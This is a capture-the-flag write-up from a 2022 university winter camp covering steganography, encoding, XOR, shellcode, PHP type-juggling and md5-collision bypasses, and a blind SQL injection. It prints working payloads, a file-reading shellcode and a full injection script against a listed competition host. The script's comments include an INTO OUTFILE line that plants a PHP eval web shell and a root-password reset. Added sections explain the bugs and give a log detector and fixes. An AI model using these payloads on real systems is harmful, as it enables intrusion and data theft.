Rank: 2
What competition is this?
Dates: 庚子土(季冬)月 丁巳土觜执日 – 辛丑土(季冬)月 壬午木胃执日
The 2022 Winter Camp hosted by Fujian Normal University's NISA team together with Xiamen University of Technology's CodeMonster team
Aside: this was, out of my entire time at university, the most absurdly speechless competition ever, mainly because a certain teammate spent the first half of the semester deceiving us, for the sake of padding his score, into carrying him to a prize, and then ran off as soon as he had it 😅
I especially look down on people who will do anything to pad their scores (here I mainly mean the ones who ask things like "Does this competition count for credit?" or "Can you carry me?")
Misc
Double Happiness
Double happiness: the archive is pseudo-encrypted, so just extract the images directly
Piece the puzzle together to get the FLAG
nico
Scanned the image with stegdetect, which identified JPHS steganography; cracked the password with break, getting 123456
After Seek, the flag comes out
NICO{GuLf_WeLc0mE_Y0U}
Crypto
Encoding: Unescape Unicode, prefix \u
\u0041\u0051\u0045\u0043\u007b\u0037\u0075\u0031\u0061\u005f\u006b\u0067\u005f\u0067\u0070\u0033\u005f\u0068\u0057\u0061\u0069\u004e\u005f\u0074\u0031\u0034\u0074\u007d
Just run it through a tool
Reverse
Simple XOR; write a short script and run it
```python
# Encrypted bytes from the binary; each one was XORed with the single-byte key 44
a = [74, 64, 77, 75, 87, 91, 73, 64, 79, 67, 65, 73, 88, 67, 88, 68, 73, 98, 101, 111, 99, 111, 120, 106, 81]
for i in range(len(a)):
    a[i] ^= 44
    print(chr(a[i]), end="")
```
The flag is visible at a glance

```asm
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x7b67616c66
xor [rsp], rax
mov rdi, rsp
xor edx, edx /* 0 */
xor esi, esi /* 0 */
push SYS_open /* 2 */
pop rax
syscall
mov rdi, rax
xor eax, eax /* SYS_read */
mov rdx, 0x101010101010101 /* 32765899414923635 == 0x746869735f6973 */
push rdx
mov rdx, 0x1756968725e6872
xor [rsp], rdx
pop rdx
mov rsi, rsp
syscall
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x7d6d73615f615f
xor [rsp], rax
mov rsi, rsp
push 1
pop rdi
push 0x64
pop rdx
push SYS_write /* 1 */
pop rax
syscall
```
Web
```php
<?php
//author: Elaine
include('./flag.php');
highlight_file(__FILE__);
$admin = 'false';
$guest = 'true';
extract($_GET);
if (md5($admin) == md5($guest)) {
    echo $FLAG;
} else{
    echo "nonono!";
}
?>
```
nonono!

A no-brainer condition: extract() lets the GET parameters overwrite $admin and $guest, and the loose == comparison on the md5 strings does the rest
Payload: ?admin=240610708&guest=240610708
NICO{Md5&3xtract_1s_S0_ez!}
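Why that payload passes the check above, as an added example written for this page rather than the challenge's own code: md5("240610708") is "0e4620..." which PHP's `==` treats as the number 0, so two such "magic hashes" compare equal even when the strings differ (the page's payload simply uses the same value on both sides). The block models PHP's numeric-string rule in Python and shows that a strict comparison is not fooled; `php_loose_equal`, `is_magic_hash` and `challenge_check` are names chosen here.

```python
import hashlib
import re

# Simplified model of PHP's numeric-string rule: an int/float literal with an
# optional exponent. "0e462097..." is 0 * 10**462097..., i.e. 0.0, in both PHP
# and Python, which is why every md5 of the form 0e<30 digits> "equals" 0.
NUMERIC_RE = re.compile(r"^[+-]?(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?$")


def php_loose_equal(a: str, b: str) -> bool:
    """PHP `==` on two strings: if both look numeric they compare as numbers."""
    if NUMERIC_RE.match(a) and NUMERIC_RE.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(s: str) -> bool:
    """True when md5(s) is '0e' followed by 30 digits, so PHP `==` reads it as 0."""
    return re.fullmatch(r"0e\d{30}", md5_hex(s)) is not None


def challenge_check(admin: str, guest: str, strict: bool) -> bool:
    """The page's condition md5($admin) == md5($guest); strict=True models ===."""
    ha, hb = md5_hex(admin), md5_hex(guest)
    return ha == hb if strict else php_loose_equal(ha, hb)


if __name__ == "__main__":
    # The defaults 'false'/'true' never pass; two different magic hashes pass
    # under loose comparison and fail under strict comparison.
    print(challenge_check("false", "true", strict=False))
    print(challenge_check("240610708", "QNKCDZO", strict=False))
    print(challenge_check("240610708", "QNKCDZO", strict=True))
```

In PHP the fix is `===` (or `hash_equals()`), which compares the hashes as strings; the loose-comparison bug is the same class the level 2 "scientific notation" note below refers to.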
S^_^Q\^_\^L
Error-based injection. Run sqlmap on it; for manual injection, a standard error-based injection statement with minor tweaks works.
Level directory
Level1: http://121.37.5.94:8310/index.php
Level2: http://121.37.5.94:8310/leVe1_two.php
Level3: http://121.37.5.94:8310/LevEl3.php
Level4: http://121.37.5.94:8310/lEvEl_4.php
http://121.37.5.94:8310/index.php?txw4ever=0.99999999999999999999999
Level 2: the md5 scientific-notation (0e...) loose-comparison vulnerability
Just generate the payload
jitanglailo=0e00506035745
Level 3: md5 collision. Find two strings with the same md5 but different content, URL-encode them, and submit
arr1=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1Bih%D3%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8U%7C%3Dm%89%DB%11%B7%BFkr%84.%01h%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%96F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%94%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9d%84%B2%F1%03&arr2=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1BihS%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8%D5%7C%3Dm%89%DB%11%B7%BFkr%84.%01%E8%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%16F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%14%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9%E4%84%B2%F1%03
Level 4: just URL-encode the parameter name
http://121.37.5.94:8310/lEvEl_4.php?%4e%49%5f%43%4f%5f=try-your-best!
Final flag
NICO{phP_1s_R3alLy_Go0d!}
SQL_4
Looking at the challenge, it is boolean-based blind injection; sqlmap got nowhere, so write an exp and run it
First examine the challenge
admin/admin returns
Entering an injection statement triggers the WAF
/ Enter a space in the username and password fields respectively
Now write a script to test which statements are filtered
and #
admin/ | admin or 1=1#
After entering this the response differs; from its content we learn that the target is the password of user me7eorite
Construct the statement directly and fire away
length(database())>6
Final exp

```python
import requests

s = requests.Session()
# burp0_url = "http://49.233.105.150:8004/index.php"
url = "http://121.37.5.94:8322/login.php"
flag = ''
proxies = {"http": None, "https": None}


def exp(i):
    # print(i, j)
    # Boolean probe: the union row carries 1 or 0 depending on whether the first
    # character of the password matches i; the response text reveals which.
    payload = f"'union/**/select/**/(mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/0,1),1,1)/**/like/**/'{i}'#"
    print(payload)
    # Statements tried along the way (kept from the original script):
    # 'order/**/by/**/1#
    # select/**/locate('t',database())/**/like/**/1
    # select mid(database(),1,1) like 't';
    # mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/1,1),1,1)
    # 'union/**/select/**/ascii(mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1))#
    # 'union/**/select/**/mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1)#
    # select/**/passwd/**/from/**/txw4ever.users;
    # '(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'))#
    # '(SELECT/**/GROUP_CONCAT(password)/**/FROM/**/testdb.admin/**/like/**/hex('1'))#
    # select/**/mid(database(),1,1)/**/like/**/'t';(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'));
    # Database name length: ||/**/(length(database())>1)#   6 chars
    # nicoCTF
    # Guess the database name: ||/**/ord(substr(database(),1,1))>14#
    # Guess tables: ||/**/ord(substr(select/**/TABLE_NAME/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database(),1,1))>10#
    # Guess tables: ||/**/ord(substr(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name,{i},1))>1#
    # Guess table name length: ||/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/REGEXP/**/'nicoCTF'/**/limit/**/1,1))>1
    # How many tables: ||/**/length(select count(table_name) from information_schema.tables where table_schema in ("nicoCTF"))>1#
    # How many tables: ||/**/length(select/**/count(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/("nicoCTF"))>1#
    # ||/**/substr((select table_name from information_schema.tables where table_schema in ("nicoCTF") limit 1,1),1,1)>{j}
    # ||/**/ord(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/limit/**/1,1),{i},1))>{j}#
    # users nico_ctf_user
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("users")/**/limit/**/2,1),{i},1))>={j}
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("nico_ctf_users")/**/limit/**/2,1),{i},1))>={j}
    # password code
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/&&/**/table_name/**/in/**/(\"nico_ctf_users\")/**/limit/**/1,1),{i},1))>{j}#
    # ||/**/ord(substr((select/**/password/**/from/**/nicoCTF.users/**/limit 0,1),{i},1))>{j}#
    # ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit 0,1),{i},1))>{j}#
    # ||/**/ord(substr((select username from nicoCTF.users limit 1,1),{i},1))>{j}#
    # substr((select username from security.users limit 0,1),1,1)='D'
    # ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit/**/1,1),{i},1))>{j}#
    # ||/**/select/**/""/**/INTO/**/OUTFILE/**/"/var/html/ice.php"#
    # ||/**/ord(substr((),{i},1))>{j}#
    # ||/**/ord(substr((show/**/global/**/variables/**/in/**/("%datadir%")),{i},1)>{j}#
    # ||/**/ord(substr(show/**/global/**/variables/**/in/**/("%datadir%"),{i},1))>{j}##
    # ||/**/union/**/select/**/1,2,3,4,5,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e/**/into/**/outfile/**/\"/var/www/html/ice.php\"#
    # ||/**/ord(substr((system/**/pwd),{i},1))>{j}#
    # ||/**/ord(substr(),{
    # update/**/user/**/set/**/password=password(\"root\")/**/where/**/user/**/in/**/(\"root\")#
    # me7eorite
    data = {"username": "bilala", "passwd": payload}
    r = s.post(url, data=data, proxies=proxies)
    if "wrong password" in r.text:
        print(r.text)
        return True
    else:
        return False


# Candidate characters for the first position of the password
chars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
         'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '~', '!',
         "@", "#", "$", "%", "^", "&", "*", "(", ")", "_", "+", "{", "}", ":",
         "<", ">", "?", ".", "/", ";", "'", "[", "]", "/", "*", "-", "+", '"']
for c in chars:
    if exp(c):
        print(c)
for i in range(1, 255):
    if exp(i):
        print(i)

# Binary-search version (commented out in the original). It expects a
# two-argument exp(i, j) built on the ord(substr(..., {i}, 1)) > {j} probes
# listed above, extracting one character per position.
# for i in range(1, 100):
#     low = 32
#     high = 127
#     while (low <= high):
#         mid = (low + high) // 2
#         if (exp(i, mid)):
#             low = mid + 1
#         else:
#             high = mid - 1
#     flag += chr((low + high + 1) // 2)
#     print(flag)
```
What really matters is just the binary-search blind injection; being bored, I wrote a bunch of other stuff as well
Database name
Current tables
Columns
Password and username
Final statement
select password from nicoCTF.nico_ctf_users limit 0,1;
Log in and get the flag
flag{202cb96_2ac59075b9_64b07152_d234b70}
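From the defender's side, the exp above leaves a very recognisable trail: `/**/` standing in for whitespace, a union-select probe, `ord(substr(...))` character extraction and information_schema lookups, repeated hundreds of times from one client. The following is an added example written for this page, not code from the write-up: a small detector run over constructed log lines built from the page's own payloads; the log format, rule names and `scan_request`/`scan_log` are assumptions made here.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Signatures of the technique in this write-up: /**/ used in place of
# whitespace, a union-select probe, ord(substr()) character extraction,
# information_schema enumeration and INTO OUTFILE writes.
RULES = {
    "comment_as_space": re.compile(r"/\*\*/"),
    "union_select": re.compile(r"union(?:\s|/\*.*?\*/)+select", re.I),
    "char_extract": re.compile(r"\b(?:ord|ascii)\s*\(\s*(?:substr|mid)\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "outfile": re.compile(r"into(?:\s|/\*.*?\*/)+outfile", re.I),
}

# Constructed log lines in a simplified "<ip> <method> <path> <body>" shape,
# built from the payloads this write-up uses (not a real server log).
SAMPLE_LOG = [
    "10.0.0.5 POST /login.php username=admin&passwd=admin",
    "10.0.0.9 POST /login.php username=bilala&passwd='union/**/select/**/"
    "(mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/0,1),1,1)"
    "/**/like/**/'a'%23",
    "10.0.0.9 POST /login.php username=bilala&passwd=%7C%7C/**/ord(substr("
    "(select/**/table_name/**/from/**/information_schema.tables/**/where/**/"
    "table_schema/**/in/**/(%22nicoCTF%22)/**/limit/**/1,1),1,1))%3E100%23",
    "10.0.0.5 GET /index.php?txw4ever=0.99999999999999999999999",
]


def scan_request(request: str) -> List[str]:
    """Names of the rules matching one request, checked after URL-decoding."""
    decoded = unquote_plus(request)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(lines: List[str]) -> Tuple[List[Tuple[str, List[str]]], Dict[str, int]]:
    """Per-request findings plus a hit count per client IP; a client that keeps
    tripping char_extract is walking a value out one character at a time."""
    findings = []
    per_ip: Counter = Counter()
    for line in lines:
        ip, _, request = line.partition(" ")
        rules = scan_request(request)
        if rules:
            findings.append((ip, rules))
            per_ip[ip] += 1
    return findings, dict(per_ip)


if __name__ == "__main__":
    for ip, rules in scan_log(SAMPLE_LOG)[0]:
        print(ip, ",".join(rules))
```

The last sample line (the level 1 float trick) is deliberately not flagged: it is PHP type juggling, not SQL injection, and needs a different rule. The real fix for the challenge application is a parameterised query, which makes the `/**/` filter bypass irrelevant.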